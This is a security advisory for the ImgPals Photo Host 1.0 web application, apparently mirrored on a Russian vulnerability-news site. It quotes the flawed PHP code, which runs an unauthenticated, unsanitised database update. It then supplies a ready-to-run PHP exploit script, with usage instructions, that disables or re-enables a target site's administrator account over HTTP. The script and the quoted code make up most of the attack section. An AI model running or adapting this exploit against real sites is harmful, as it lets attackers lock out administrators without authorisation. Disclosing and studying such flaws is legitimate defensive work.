Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Aurora WebOPAC SQL Injection - Security Advisory - SOS-12-004

  Brute Force и XSS уязвимости в Webglimpse

  Vulnerability Description: XSS-(CROSS SITE SCRIPTING VULNERABILITIES) (ZAPHOD BREEBLEBROX'S BLOCKER A.K.A. ZB BLOCK)

  phpMyVisites 2.4_XSS

From:CorryL <corryl80_(at)_gmail.com>
Date:19 марта 2012 г.
Subject:ImgPals Photo Host Version 1.0 Admin Account Disactivation

-=[--------------------ADVISORY-------------------]=-

ImgPals Photo Host Version 1.0 STABLE

Author: Corrado Liotta Aka CorryL [[email protected]]
-=[-----------------------------------------------]=-


-=[+] Application: ImgPals Photo Host
-=[+] Version: 1.0 STABLE
-=[+] Vendor's URL: http://www.imgpals.com/forum/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Admin Account Disactivation
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

..::[ Descriprion ]::..

I released the ImgPals Photo Host Version 1.0 STABLE


Features Include:

   * Easy Install
   * Full README file included
   * Full Control Panel to control your site
   * User Side Features
         o Multiple JQuery Uploads
         o Create and Edit Photo Albums
         o Make Albums Public or Private
         o Describe Albums and Photos
         o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
         o Add Friends
         o Chat with Friends
         o Update people with status wall posting
         o Manage Profile
         o Profile Avatar Uploads
         o Private Messaging
   * And much more, be sure to check out the Demo


..::[ Bug ]::..

A attaker can remotely disable the account from administratore not
allowing the same to be able to access the site

..::[ Proof Of Concept ]::..

if ($_GET['a'] == 'app0'){
                $sqlapprove = mysql_query("UPDATE members SET
approved = '0' WHERE id = '".$_GET['u']."'");

by sending the command approve.php? u = a = 1 & app0 a attaker can
disable the Administrator account.

..::[ Exploit ]::..

#!/usr/bin/php -f
<?php


//Coded by Corrado Liotta For educational purpose only
//use php exploit.php server app0 or app1
//use app0 for admin account off
//use app1 for admin account on

$target = $argv[1];
$power = $argv[2]

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород